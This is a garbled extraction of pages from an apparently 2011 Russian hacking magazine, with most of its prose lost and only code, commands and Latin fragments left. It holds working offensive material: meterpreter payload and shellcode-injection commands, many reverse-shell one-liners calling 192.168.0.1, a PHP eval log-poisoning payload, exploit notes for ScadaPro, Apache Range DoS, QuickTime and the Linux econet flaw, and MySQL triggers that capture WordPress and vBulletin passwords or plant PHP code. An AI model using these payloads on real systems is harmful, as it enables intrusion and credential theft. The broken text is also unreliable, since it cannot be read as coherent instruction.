Intercepter gratuitous arp , , ,
. Sniffing
dhcp based network.

ICMP REDIRECT MITM DNS OVER ICMP MITM


ICMP. ICMP Redirect, , ICMP-

. IP- IP-
, .
, , site.com 1.2.3.4,

0X4553-INTERCEPTER

-
: ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/
BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/
MYSQL/ORACLE.
:
ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC/MRAl.
SMTP/POP3 .

ARP- (ARP SCAN).
DHCP- (DHCP DISCOVERY).
(PROMISCUOUS SCAN).
MAC- LAN-.

(eXtreme mode),
. 0x4553-Intercepter
,
,
.
RAW-.
RPCAP, Linux/xBSD Windows-
( ).
NAT.
MITM-: ARP MITM, DNS over ICMP MiTM,
DHCP MiTM.
SSL- SSL MiTM + SSL Strip.

, , 1.2.3.4
, Intercepter NAT.
ICMP Redirect MITM. , , . Intercepter
,
ICMP Redirect. DNS
over ICMP Redirect.
site.com
DNS-. .
, DNS-
, 0x4553-NAT, DNS-. , site1.com, NAT ,
IP-, site1.com,
ICMP Redirect, ,
IP- .
site2.com, .
, - Intercepter
NAT.
, . , :
IP- - 192.168.1.10
IP- - 192.168.1.1
IP- DNS - 192.168.1.2
- 255.255.255.0

SSL MITM. 0x4553-NAT

038

DNS-
.
, ICMP. (, 8.8.8.8),
.

11 /154/ 2011

C + MITM- = 0x4553-Intercepter

SSL
SSL MITM
, , ,
Intercepter. MITM- Intercepter,
, NAT.

. :
HTTPS 443;
POP3S 995;
SMTPS 465;
IMAPS 993.
0x4553-NAT .

. :
HTTPS NAT tcp-,
.

, .

.

,
.
, .
.
, . , , . NAT,
Intercepter .
, NAT :
SSL- ,
.

SSL STRIP
SSL Strip #125 (PDF-
). ,
SSL . HTTP-, https-. , ,
unix,
sslstrip. Intercepter SSL Strip SSL MITM,
. -
80- , . , , .

0x4553-NAT

SSL Strip favicon

.
,
. ,
gzip deflate.
- web-.
Accept-Encoding, . ,
,
gmail. Secure HttpOnly.
https- http.
https- https
. ,
Intercepter favicon, ,
. Intercepter
,
sslstrip, , , .
SSL Strip unix-.
sslstrip , web-.
dns dns-.
, , 0x4553-NAT,
. z

SSL MITM.

11 /154/ 2011

039

PHREAKING


!
VGA- FPGA
,
.
.

, , ,
VGA , ,
!
!


, , vga atmega, , Atmega
640 480 2020. , VGA-.
8040 ,
.
VGA arm7 100
,
, :(.
' , .
, !

?
CPLD FPGA. , ,
CPLD FPGA . FPGA ,
. -

040

11 /154/ 2011

, .
.
ebay.com FPGA
. ,
VGA! , :
1 , 8 , 8 , -, 2 PS/2
, 4 , ? ,
Altera Cyclone EP1C6 c 5980 ( ,
) 90
. 50, , PLL
( 2), 320. PLL , .

, , 8$
. .

?
( , ), (!) DVD-:

Altera
, ,
!

, (
, :)). , Altera
QuartusII Web Edition Software. 11.0, 9.1 - 2.
.
,
FPGA Altera ( ),
marsohod.org.
, ,
EPM240T1005, . ,
Verilog,
.
goo.gl/ZaCOa. . Verilog,
VHDL.
, , , !
!
VHDL Verilog , Verilog. , ,
. ,
, , .

. 1. VGA

11 /154/ 2011

. 2. Altera

2.

GREEN

3.

BLUE

4.

RES

5.

GND

6.

RGND

7.

GGND

8.

BGND

9.

KEY

10.

SGND

11.

ID0

12.

SDA

13.

HSYNC

14.

VSYNC

15.

SCL

VGA

VGA.
,
, VGA. 1987
,
.
15- .
1 .
1.
VGA :
( ). RED, GREEN
BLUE, 0 0.7 (
5 ). :
,
. .
, ,
.
5- (
, ).

041

PHREAKING

. 4.

640480
60 .
(
) ( ).
:
8 ;
96 HSYNC;
40 ;
8 ;
640 ;
8 .
800 .

:
2 ;
2 VSYNC;
25 ;
8
480 ;
8 .
525 .

,
. (
:)) (60) * (525) *
(800). 25.2 .
, , 25 .


: -
.
,
, .
-
.
.
. .

042

Verilog
. ,
,

, . ,
, .
, ( :)) :

50 25 .
-
, -


VGA-
(divide_clk)
, . 50 , 25 . st,
.
, .
- (async_receiver)
- . ,
, . ,
, fpga4fun.com (www.fpga4fun.
com/files/async.zip). ,


50 ,
25
11 /154/ 2011

. 3.

,
. ,
,
, !
:
( divide_clk) RX (
).
RxD_endofpacket (
) RxD_data 8 ,
. 25
- 115200:8:N:2. . - 50
5980.
50 ,
!
, -
(write_memory).

( en )
- ( data_in),
pos_of_write ( ),
address data_out
.
, 1 wr_en.
, . : 0 3071
, 3100 9499 .
!
(memory)
, , .
massiv[1000] .
. , ,
, RAM
Megafunction User Guide users.ece.gatech.edu/~hamblen/
UP3/ug_ram.pdf. , , 4 :
RAM (Single port RAM)
.
RAM (Single port RAM)
.
(Simple dual-port RAM)
.
RAM(Tri-state RAM) ,
.

11 /154/ 2011

,
, RAM (Single
port RAM) .
, ?
MegaWizard. .
ToolsMegaWizard Plug-in manager.
,
(Create a new custom megafunction variation). ,
. .
, , , .
Memory CompilerRAM:2PORT.
, ,
. , , .

/.
(With one read port and one write port), ,
(As a number of words).
Next ( )
How many 8-bit words of memory? 10000
(.. 80000 ). Finish, , .
:
clock ; 50
. ,
320 .
rdaddress wraddress .
data .
wren (write enable) 1,
wraddress data.
q , wraddress.
, -

. 5. Pin Planer

043

PHREAKING
ADDRESS_RADIX = UNS;
DATA_RADIX = BIN;
CONTENT BEGIN
00 : 00000000; -- 0
01 : 00000001; -- 1
...
END;
:
BIN ;
HEX ;
OCT ;
DEC , ;
UNS , .

. 6.

. 7.

. wraddress q
( 50 ;
PLL).
, , , , . , .
, !
2
: Intel Hex mif (memory initialization format).
(
; 812),
Intel Hex . ,
mif.
,
:
DEPTH = 3072;
WIDTH = 8;

044

,
1, 00000001 , Altera Web Edition ,
, .
. ,
, 8, .
. MegaWizard, ,
( Edit
an existing custom megafunction variables).
Next,
(. 3). , (Yes, use this file for the memory content data)
. ,
.
VGA- (vga_module)
! ,
, .
, 80 .
, ; 80-
;
.
?
. , . 80
.
480,
. 12
( ).
, .
, ,
( + 1) . .
12 , .
( , tick_counter,
).
(tick_counter == 1) ,
.
(tick_counter == 3; , )
.
(tick_counter == 5)
temp. tick_counter 8, tempa data_for_screen, .
(tick_counter == 6)
, . data, ,
data_for_screen, font.

11 /154/ 2011

,
. , ,
. , ,
!
...
,
. , . Project Navigator Files,

Create Symbol Files for Current Files
. FileNew
Block Diagram/Schematic Files.
Symbol tool (
) ,
. , ,
/. , . / ,
, . .
4.
/ ?
Pin Tool ,
: , . ,
.
.
! AssigmentsPin Planner .
/ , .
Location .


, ( ,
), . USB- JTAG- .
Altera (
marsohod.org, ).
Tools Programmer, ,
JTAG (Hardware Setup).
Start .
, RS-232 (
) ,
HyperTerminal c 115200:8n:2 , ,
, .
,

, , , .
, , 12
, ! -
( ),
. .
File Convert Programming Files.
:
1. Programming file type JTAG
Indirect Configuration File (.jic).
2. Configuration Device EPCS1
.
3. , .
4. Input Files to convert Flash Loader,
Add Device... Cyclone.
5. SOF Data Page_0, Add Files
.sof
.
6. ,
Properties. , :
Compression! .
7. Generate.
8. , Add File .jcc.
9. Program Verify - .
!

?
, , ,
, ! !
.
goo.gl/DVsja
MouseRefComp.
, ! ,
640480.
VGA
.
(!) :
if ( (line_count == y_mouse) && (letter_address/2 ==
x_mouse) ) font = 255; else font = data;
tick_counter = 0.
MouseRefComp
50 ( 100 ) ps2interface 2 DELAY100US,
DELAY20US, DELAY63CLK DEBOUNCE_DELAY.
! ,
, VGA. ,
, , - :)!

. 8.

11 /154/ 2011

, , ' ! ,
, , . , ,
1 . ,
SPI ,
, , sd/mmc .
.
, .
. ,
. , ,
DVD goo.gl/MYIeP. z

045

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
-

DDoS ,
,
.
Apache. , DDoS
-, 60% .
range' Apache
. ,
nmap'
http-vuln-cve2011-3192.nse ( ).
, .
, DDoS Google (goo.gl/U9c3K). ,
IHteam
, - . ,
, ,
, . : Google
.

,
, DDoS'.


Google. ,
IP- .
, , , ,
SQL-, , . :
1. https://plus.google.com/_/sharebox/
linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j
2. https://images2-focus-opensocial.googleusercontent.
com/gadgets/proxy?url=<SITE>&container=focus
<SITE> , <RANDOM_NUMBERS>
.
goo.gl/f67F1. , IHteam
Google , , , .

--. -

046

11 /154/ 2011

EASY HACK

, HTTPS-, .

(HTTP HTTPS) domain.
, domain
,
. ,
. example.com (web.example.com) (example2.com).
.
( ). : web.
example.com example.com. ,
, , example.com,
web.example.com. . , ,
HTTPS c Secure, -

. : HTTP
. ,
( )? . , - MITM- ,
HTTP-
Set-Cookie . !
?
, . ,
session fixation (
),
. - , .

. ,
( -), - .

, . ,
, . . ,
-
. , ,
.
(netstat -nao).
. ,
, ,
- :).
, code dll-injection. , /
.
, , ,
. ,
. ,
,
. ,
. .
, , .
syringe (bit.ly/l8QE3D). ,
msfpayload. , , alpha_
mixed. -
, -
. Syringe
shellcodeexec ( ),
, . , .
. , Internet Explorer'
. , ,
meterpreter IE
. :

11 /154/ 2011

1. meterpreter reverse- :
./msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=thread LPORT=5555 LHOST=192.168.0.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw
BufferRegister=EAX
2. , :
./msfcli multi/handler PAYLOAD=windows/meterpreter/re
verse_tcp EXITFUNC=thread LPORT=5555 LHOST=192.168.0.1 E
3. , (IE):
syringe.exe -2 PYIIIIIIIIII1VSVXEPAA PID_IE

:
PYIIIIIIIIII1VSVXEPAA ;
PID_IE iexplore.exe (
tasklist);
-2 syringe.exe .

IE meterpreter,
, . , meterpreter,
,
. :).
, Syringe .
-3, syringe (
shellcodeexec). -1 , DLL',
. , msfpayload DLL' . ,
, , , DLL'
.

047

/ EASY HACK

WEB-,
LFI-

LFI (Local File Inclusion) ,


,
. ,
, .
, ,
. , LFI ( RFI).
.

- ,
LFI. -.
, .
. ?
SSH-.
OpenSSH,
, . : .
/var/log/auth.log , ,

. , :
<?php eval($_GET[cmd]); ?>
, .
. -,
( ), -, ,
. ,
, .

( ) NTFS

- NTFS (Alternative Data Stream,


ADS). : 15 .
, , ,
.
.
. -, , $DATA. , ,
,
, , , . -,
, .
, ,
( ). -,
, . -, ,
, ,
.
, , . , ADS . .
secrets.txt
echo "some secrets" > test.txt:secrets.txt

048

secrets.txt
more < test.txt:secrets.txt
notepad.exe test.txt:secrets.txt

11 /154/ 2011

EASY HACK


type C:\windows\system32\calc.exe > test.txt:calc.exe

dir /R

,
.
mklink.

, . , *nix (UFS) (hardlink) ,


, .
.
NTFS , -
. NTFS
. XP
:

mklink link_file.txt test.txt:secrets.txt

fsutil hardlink create _ _

( )
start c:\test.txt:calc.exe
wmic process call create \\.\c:\test.txt:calc.exe



/R:

Vista, mklink c '/h':


mklink /h _ _

- Windows. *nix. Windows .


.
, ,
- ,
. : ,
.
. 192.168.0.1.
:
-
nc l p 8080 e '/bin/bash'
-.
nc l p 5555
-.
nc 192.168.0.1 5555 e '/bin/bash'
e netcat ,
- FIFO:
- e
mknod bp p; nc 192.168.0.1 5555 0<bp | /bin/bash 1>bp
netcat , :
- netcat
/bin/bash -i > /dev/tcp/192.168.0.1/5555> 0<&1 2>&1
2- telnet
mknod bp p; telnet 192.168.0.1 5555 0<bp | /bin/bash 1>bp

, (perl, awk,
shell ..) - /.
- Ruby:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.1",
"5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
io.read}end'
Perl:
perl -e 'use Socket;$i="192.168.0.1";$p=5555;socket(S,
PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,
sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(
STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

, wget, .
wget -O /tmp/shell.php http://192.168.0.1/good_php_shell.
txt && php -f /tmp/shell.php
, , -
Xterm. 6001 :

Xnest:1
xhost +ip_

xterm -display 192.168.0.1:1
, :).

EXE-

msfencode
exe- .
, . exe- ,
, (, ) ,
.
.
11 /154/ 2011

./msfpayload windows/meterpreter/reverse_tcp LPORT=5555 R


| ./msfencode -a x86 -t exe x cmd.exe k

:
-x (exe);
-k .
:)
049

(ivinside.blogspot.com)
(115612, . , .1)


, .

.


Measuresoft ScadaPro

CVSSV2

7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P)

BRIEF

SCADA-, ,
. , , , ,
SCADA. SCADA ,

, ,
. , , , , -
.
ScadaPro Measuresoft.

!
EXPLOIT
service.exe, 11234.
,
. ,
.
aluigi , . ,

050

.
.
, ,
- sscanf strcpy:
0040A0D9
0040A0DD
0040A0DE
0040A0E3
0040A0E4

.
.
.
.
.

LEA EDX,DWORD PTR SS:[ESP+38]


PUSH EDX
PUSH service.0067D484
; "%s"
PUSH EDI
CALL service.004192FB
; sscanf

>
.
.
.
>
.
.
.
.^

LEA EDX,DWORD PTR SS:[ESP+20]


MOV EAX,EDI
SUB EDX,EDI
LEA ESP,DWORD PTR SS:[ESP]
MOV CL,BYTE PTR DS:[EAX]
MOV BYTE PTR DS:[EDX+EAX],CL
ADD EAX,1
TEST CL,CL
JNZ SHORT service.0040A120

...
0040A114
0040A118
0040A11A
0040A11C
0040A120
0040A122
0040A125
0040A128
0040A12A

: aluigi.org/poc/scadapro_1.zip.
,
:
nc SERVER 11234 < scadapro_1b.dat
; c:\boot.ini
nc SERVER 11234 < scadapro_1c.dat
; c:\evil_file.txt
nc SERVER 11234 < scadapro_1d.dat

11 /154/ 2011

Accept-Encoding: gzip
Connection: close
Range.
,
. gzip-
(Accept-Encoding: gzip)
. , Range
, Apache ,
.
,
Request-Range, Netscape Navigator
2-3 MSIE 3.

, . :
$p, , , HEAD /
HTTP/1.1 HEAD /robots.txt HTTP/1.1
URL.

Apache, . :

, Apache

; c:\valid_file.txt
nc SERVER 11234 < scadapro_1e.dat
; notepad

$ curl -I -H "Range: bytes=0-1,0-2" -s www.example.com/


robots.txt | grep Partial

PoC Metasploit, /
/ .
TARGETS
Measuresoft ScadaPro <= 4.0.0

TARGETS
- Apache 1.3.x, 2.0.x 2.0.64 2.2.x
2.2.19.

SOLUTION
.

SOLUTION
nginx,
:


- Apache

CVSSV2

206 Partial Content,


.
- , ,
. .

7.8

proxy_set_header Range "";


proxy_set_header Request-Range "";

(AV:N/AC:L/AU:N/C:N/I:N/A:)
BRIEF
Full Disclosure
, -
Apache, 2.2.x.
,
, ,
,
.
EXPLOIT
goo.gl/DK1pA.
:
$ perl killapache.pl www.example.com 50
,
, .
:
HEAD / HTTP/1.1
Host: www.example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300

11 /154/ 2011

Apache
Range mod_header (RequestHeader unset Range
RequestHeader unset Request-Range)
Range mod_rewrite:
1
RewriteEngine On
RewriteCond
RewriteCond
RewriteCond
RewriteRule

%{HTTP:Range} bytes=0-[0-9]+, [NC,OR]


%{HTTP:Range} bytes=([0-9-],){4,} [NC,OR]
%{HTTP:Range} bytes=[0-9,-]+,0-(,|$) [NC]
.? http://%{SERVER_NAME}/ [NS,L,F]

2
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC]
RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(\s*,\s*[0-9]*[0-9]*)+
RewriteRule .* [F]
3
RewriteEngine On

051

ScadaPro

RewriteCond %{HTTP:Range} bytes=0-.* [NC]


RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]
, , Apache 2.2.20.

Apple QuickTime PICT


PnSize Buffer Overflow

CVSSV2

9.3

,
. ,
.
PICT- 512 ,
.
QuickDraw/Color QuickDraw. QuickDraw-
,
, .

(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
: 8 2011
: MC, corelanc0d3r
CVE: CVE-2011-0257
QuickTime Apple, 1991 ,
, , ,
. QuickTime Player ,
,
, , , (VR).
EXPLOIT
PnSize
PICT-. 16-
32- .

052

picSize:
picFrame:

INTEGER;
RECT;

, . , .
1- ,
. 1-
2- (0x0011). 2-
(0x02ff).
( 30 ):
$0011
WORD
$02FF
WORD
$0C00
WORD
24

{ }
{ }
{ }
{}

11 /154/ 2011

ROP-

( ):
opcode WORD
data . . .
opcode WORD
data . . .
...
$00FF
WORD

{ }
{ }

0x13BDF8,
.
ROP-, DEP
.
ROP-:
67202C75

ADD ESP,4D0

67202C7B
67E21084
67E21085

RETN
POP ECX
RETN

68994002
68994004

MOV EAX,DWORD PTR DS:[ECX]


RETN

6696CA36
6696CA37

XCHG EAX,ESI
RETN

66C78001
66C78002

POP EBP
RETN

,
6691CCD8
.
JB SHORT QuickT_1.6691CD04
6691CCDA
.
REP MOVS DWORD PTR ES:[EDI],
DWORD PTR DS>
6691CCDC
.
JMP DWORD PTR DS:[EDX*4+6691CDF4]

67208003
67208004

POP EBX
RETN

6783EE02
6783EE03

POP EDX
RETN

n edi , access violation. SEH- -

67E21084
67E21085

POP ECX
RETN

{ }

:
...
$0006
$0007
$0008
...

SpExtra
PnSize
PnMode

space extra (fixed point)


pen size (point)
pen mode (word)

4
4
2


PnSize, ,
.

11 /154/ 2011

053

6762A008
6762A009

POP EDI
RETN

685A9802
685A9803
682F0001
682F0002
66A78005

POP EAX
RETN
PUSHAD
RETN
RETN

,
( ):
67EB8573
0013B53C
0013B540
0013B544
0013B548
...

CALL ESP
90909090
EB5903EB
FFF8E805
4949FFFF

II

msf exploit(apple_quicktime_pnsize) > set CMD calc.exe


CMD => calc.exe
msf exploit(apple_quicktime_pnsize) > show options
Module options (exploit/windows/fileformat/apple_quicktime_pnsize):
Name
Current Setting Required Description
------------------ -------- ----------FILENAME msf.mov
no
The file name.
Payload options (windows/exec):
Name
Current Setting
Required Description
------------------------- ----------CMD calc.exe yes The command string to execute
EXITFUNC process yes Exit technique: seh, thread,
process, none
Exploit target:
Id Name
-- ---0
Windows XP SP3 with DEP bypass


metasploit:

msf exploit(apple_quicktime_pnsize) > exploit


[*] Generated output file /home/lalala/.msf4/data/exploits/msf.mov

msf > use exploit/windows/fileformat/apple_quicktime_pnsize


msf exploit(apple_quicktime_pnsize) > set payload windows/exec
payload => windows/exec

TARGETS
Apple QuickTime Player 7.60.92.0
SOLUTION
,

SEH-

054

11 /154/ 2011

Linux Kernel < 2.6.36.2 Econet Privilege


Escalation Exploit

CVSSV2

6.2
(AV:L/AC:H/AU:N/C:C/I:C/A:C)

BRIEF
: 5 2011
: Jon Oberheide, CVE: CVE-2010-4073
EXPLOIT
,

. ,
, CVE. CVE-:
CVE-2010-3848
econet_sendmsg, net/econet/af_econet.c Linux < 2.6.36.2.
econet ,
, iovec-.
CVE-2010-3850
ec_dev_ioctl net/econet/af_econet.c Linux < 2.6.36.2
CAP_NET_ADMIN,
econet ioctl- SIOCSIFADDR.
CVE-2010-4073
ipc Linux < 2.6.37-rc1 , -

:
$ gcc 17787.c -o expl -lrt
$ ./expl
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff81088ad0
[+] resolved symbol prepare_kernel_cred to
0xffffffff81088eb0
[+] resolved symbol ia32_sysret to 0xffffffff81046692
[+] spawning children to achieve adjacent kstacks...
[+] found parent kstack at 0xffff88001c6ca000
[+] found adjacent children kstacks at 0xffff88000d10a000
and 0xffff88000d10c000
[+] lower child spawning a helper...
[+] lower child calling compat_sys_wait4 on helper...
[+] helper going to sleep...
[+] upper child triggering stack overflow...
[+] helper woke up
[+] lower child returned from compat_sys_wait4
[+] parent's restart_block has been clobbered
[+] escalating privileges...
[+] launching root shell!
# id
uid=0(root) gid=0(root)
TARGETS
Linux Kernel < 2.6.36.2
SOLUTION
, . z

Pr0xor (php.m4sql@gmail.com, rdot.org/forum)


MYSQL

,

WWW

MySQL 5
:
,
.


,
.


.
056

bit.ly/puA2KI

UDF-
MySQL 4.
bit.ly/rhl5yM

UDF-
.
bit.ly/rnO25g

AppArmor.
bit.ly/4cvqnW


.
bit.ly/cT6S7

. MySQL Proxy
bit.ly/p2PfjD
RDot,
.

DVD





? SQL, .
,
,
.
.
. SQL-.

. , ,
. :
() ,
.
.
, , INSERT,
UPDATE DELETE. ,
,
, .


-
,
, .

11 /154/ 2011

EMS SQL Manager

,
,
,

.
,
. MySQL .
, .
, WordPress. ,
,
.
,
, ,
, , .
, WP , ,
.
, , ,
, , , , .
, .
, , , ,

:
CREATE TABLE 'wplog' (
'id' INT NOT NULL AUTO_INCREMENT ,
'user' VARCHAR(20) NOT NULL ,

11 /154/ 2011

'user_pass' VARCHAR(64) NOT NULL ,


'timestamp' TIMESTAMP NOT NULL ,
PRIMARY KEY ( 'id' )
);
wplog test,
wordpress.
:
CREATE TRIGGER 'wp_log' BEFORE UPDATE
ON 'wordpress'.'wp_users'
FOR EACH ROW BEGIN
IF NEW.user_pass!='$P$B9v9rCvKUXneMDBnlvCaO74EtBG77hM' THEN
SET @pass = NEW.user_pass;
INSERT INTO 'test'.'wplog'
SET 'user'= USER(),'user_pass'=@pass;
END IF;
END;
, wp_users
, - ,
, wplog
. .
, , ,
, ,
- php-. ,

MySQL, ,
, ,
.
,
. ,

057


WORDPRESS

VBULLETIN 3
vBulletin 3
.
, Powered
by vBulletin Google 2 ,
(bit.ly/ovMKX1)
. , ,

.
bit.ly/dBrtaA.
SQL-
, exploit-db.com.

, ,

wp_usermeta. ,

, ,
,
. ,
,
PHP-.
,
, MySQL Proxy.
master-slave ,
slave & master . MySQL Proxy
, .
lua,
- MySQL . : bit.ly/rcxQxI.


.
WordPress 2.5.1. ,
wp_options
:
active_plugins

a:1:{i:0;s:19:"akismet/akismet.php";}

,
, ,
. , , . ,
./wp-settings.php. WP 2.5.1
:
if ( get_option('active_plugins') )
{
$current_plugins = get_option('active_plugins');
if ( is_array($current_plugins) )
{
foreach ($current_plugins as $plugin)
{
if ('' != $plugin && file_exists(
ABSPATH.PLUGINDIR .'/'.$plugin))
include_once(ABSPATH.PLUGINDIR.'/'.$plugin);
}
}
}
, ,
.
. (2.8 )
,
.

WordPress

058

11 /154/ 2011

2.5.1 , ,

wpaddplugin:
CREATE TRIGGER 'up_pluggin' BEFORE INSERT
ON 'wordpress'.'wp_comments'
FOR EACH ROW BEGIN
IF NEW.comment_content = 'wpaddplugin' THEN
UPDATE 'wordpress'.'wp_options'
SET 'option_value' = 'a:1:{i:0;s:17:"../../../e/hi.php";}'
WHERE 'wp_options'.'option_id' =36;
END IF;
END;
../../../e/hi.php
-, php,
, EXIF- php-.
.
rdot.org.

VBULLETIN

, MySQL Proxy

. ?
:
MySQL?
FILE,
777
SELECT ... INTO OUTFILE ....
FILE .
, ,
,

( CMS ,
).

11 /154/ 2011


,
,
.
vBulltin 3.
,
/ ,
. :
,

aj4x user:
CREATE TRIGGER 'vb_users' BEFORE UPDATE
ON 'vb'.'post'
FOR EACH ROW BEGIN
IF NEW.pagetext = 'getadmindata' THEN
SET @my_user = NEW.title;
SET @data = (SELECT concat(username,':',password,':',salt)
FROM user WHERE username=@my_user);
UPDATE 'vb'.'pmtext' SET 'message' = @data
WHERE 'pmtext'.'title' ='aj4x';
END IF;
END;

059


,
:
1.
,

;
2.
(


).

MySQL 5.0.2.

,

INSERT, UPDATE DELETE.
,
CREATE
PROCEDURE, CREATE FUNCTION CREATE
TRIGGER .

CALL.
, ,
(
SQL
), ,
(INSERT,
UPDATE, DELETE),
.
:
INSERT

: INSERT, LOAD DATA


REPLACE.
UPDATE ,
,
UPDATE.
DELETE
,
DELETE REPLACE.

, AFTER,
, .
3. trigger_event :
INSERT, UPDATE, DELETE.
4. tbl_name ,
.
5. trigger_body SQL-,
.

, DROP
TABLE TRUNCATE
,
DELETE.
,
,
-.
MySQL 5.1.6 SUPER,
5.1.6 TRIGGER.
:



(

).

:
1. ,

.
USE < >
<
>.< >.
2.

,
';'.
,

delimiter.
phpMyAdmin,

, delimiter
.

CREATE
[DEFINER = { | CURRENT_USER }]
TRIGGER trigg_name trigg_time trigg_event
ON tbl_name FOR EACH ROW trigger_body
,
, :
1. trigger_name ,
.
2. trigger_time , . : BEFORE
AFTER, , .
, ,
trigger_time BEFORE, -

,

.
, MySQL 5.

.

,
.

.
, aj4x,
print_r(ini_get_all()),
SQL :
INSERT INTO 'datastore'
VALUES
('pluginlist',
'a:1:{s:13:"ajax_complete";s:25:"print_r(ini_get_all());\r\n\";}',
1);


-
. , -
vBulletin 3
PHP- .
,
, , :). post
auth Admin Panel Code Execution. ,
PHP- ,
. ,
, ,
: ,
,
.

060

INSERT INTO 'plugin'


('pluginid', 'title', 'hookname',
'phpcode', 'product', 'devkey',
'active', 'executionorder')
VALUES
(1, 'aj4x', 'ajax_complete',
'print_r(ini_get_all());', 'vbulletin', '',
1, 5);
, vb_foruma.net/ajax.php,
!
,
.
php-

11 /154/ 2011

UDF
, CREATE FUNCTION
MySQL (
) UDF
( ). UDF-
MySQL
.
, SQL-,
UDF-
.
, UDF-,
.
MySQL 4 .

LIB_MYSQLUDF_SYS,
, UDF (mysqludf.org). ,
,
. UDF, .
:
1. (
) lib_mysqludf_sys_0.0.3.tar.gz, /usr/lib/mysql/
plugins.
2. :

lib_mysqludf_sys mysqludf.org

FOR EACH ROW BEGIN


IF NEW.pagetext = 'mynewtestdata' THEN
SET @exists_plugin = (SELECT data FROM 'vb'.'datastore'
WHERE 'datastore'.'title'='pluginlist');
UPDATE 'vb'.'pmtext'
SET 'message' = @exists_plugin
WHERE 'pmtext'.'title' ='aj4x';
DELETE FROM 'vb'.'datastore' WHERE title='pluginlist';
INSERT INTO 'vb'.'datastore' VALUES ('pluginlist',
'a:1:{s:13:"ajax_complete";s:23:"print_r(ini_get_all());";}',
1);
DELETE FROM 'vb'.'plugin';

CREATE FUNCTION sys_eval


RETURNS string SONAME 'lib_mysqludf_sys.so';
3. sys_eval,
:
select sys_eval ('id')
uid=60(mysql) gid=107(mysql) groups=107(mysql),0(root)
, ,
: , lib_
mysqludf_sys.so, ,

, . , ,
(, /usr/lib/mysql/plugins
777),
FILE, lib_mysqludf_
sys.so SELECT ....
INTO OUTFILE. ,
,

. sys_eval
AppArmor, ,
,
, .

,
.
, ,

:
CREATE TRIGGER 'vb_pluggin' BEFORE INSERT
ON 'vb'.'post'

11 /154/ 2011

INSERT INTO 'vb'.'plugin'('pluginid',


'title', 'hookname', 'phpcode',
'product', 'devkey', 'active',
'executionorder')
VALUES
(1, 'aj4x', 'ajax_complete',
'print_r(ini_get_all());',
'vbulletin', '', 1, 5);
END IF;
END;
,
mynewtestdata
ajax.php, , , ,
!


,

. MySQL-.
PHP- .
- Zend IonCube,
, ,
,
. , -
, , , .
, , localhost,

(, phpMyAdmin), ,
,
. ,
. z

061

RushteR (rushter.com)

WordPress

,
,

,
.
. ,
,
.
?
062

WWW
:
domenforum.net
SEO :
searchengines.ru
xt
:
xtool.ru

:
investmn.ru

:
alexa.com
:
bit.ly/o0nUi4
AddUrl :
:
webmaster.yandex.ru
Google:
www.google.com/addurl
GoGo:
gogo.ru/wmaster/add_site.html
WebAlta:
www.advans.ru/webalta
Yahoo:
bit.ly/H1NX
MSN/Bing:
bit.ly/nsAcZH
Rambler:
bit.ly/nWv3IR
Aport:
bit.ly/zwKMt

11 /154/ 2011

WordPress

AB OVO

. -, . ,
,
, . , RSS-
.
7 :
1. ;
2.
;
3. (, ,
..);
4.
;
5. ;
6. ;
7. 1.

. :
-. : .
, ,
.
. . ,
, ,
. ?,
. : , ,

,
. !

justdropped.com. ,
, . ,
,
. .


. , ,
.

,
( ).
RSS-.
, , , .
,
10-15
1-2
. , .

,
.
- . ,
. ,
, .
. ,
-.
. , ,
tbp3 BRush
.

:
.
blogger.com, livejournal.com wordpress.com. .
:
. :
1.
;
2. ,
;
3. .

. vds , shared-
-
, .
. .
, (
) . , ,
.

WORDPRESS

Xml sitemap
bit.ly/9Kcg9Z


XML-
, ,
.
, .

11 /154/ 2011

Platinum Seo Pack


bit.ly/QGOMs

SE-


. :
,
, -, .

WP Super Cache
bit.ly/2JRmag

, .

10, WP Super
Cache

.

.

Popular Posts
bit.ly/fTOJ

,
.

, .
(
).

Simple Tags
bit.ly/1TAGjC


.

. ,
.

.

063


RSS-
.
.
RSS- (subscribe.ru/catalog/?rss,
rssportal.ru).
,
RSS,
. .
: 3-5
, , -
, ,
.
, :
1. ;
2. 300;
4. 5 ;
5. ;
6. .
?


WordPress ( Drupal DLE). ,
.
, , FeedWordPress. RSS-.
:

RSS/Atom;
;
;
/ ;
;
;
cron.

, :
1. Syndication, Posts & Links. New posts Hold syndicated posts for review; mark as Pending,
Permalinks point to: The
local copy on this website.
.
2. RSS, add multiple, Syndication. RSS-,

Amazon.com

064


1. .
Google
Adsense. ,
, . ,
, MFA (Made for Adsense).
2. .
:
.
3. .
sape.ru
linkfeed.ru. ,
, SEO-.
,
. - .
4. .
. ,
.
,
. , ,
:-).
5. .

. ,
.
6. ookie stuffing.
cookie stuffing (bit.ly/pObKhh).
.

. , , ,
, . -
. ,
Amazon.com, 15%.

,
Add.
. Subscribe to selected
resources.
3. Syndicated
resources Update checked. ,
, .
4. - ,

1-2 .
5. , 2 , . ,
.
FeedWordPress , .
WordPress , ,
, . . CMS . RSS

11 /154/ 2011

>> coding

FeedWordPress


?
, .
1. .
,
.
2. .
, , ,
.
3. .
, .
4. :
;
;
;
;
HTML;
/.
5. .
6. .

, ,
.




, (Google
).
CMS (
)
RP- ( ). WordPress
RPC : XML-RPC
. (
) ,
HTML- .

. . ,
2-3 , .
50-60%
(
Xrumer). , , liveinternet.
.
,
.
. -5,
.

?
.
.

.
,
.

.
, ,
, xtemplate.ru blogstyle.ru.
, ,
( ,
).

,
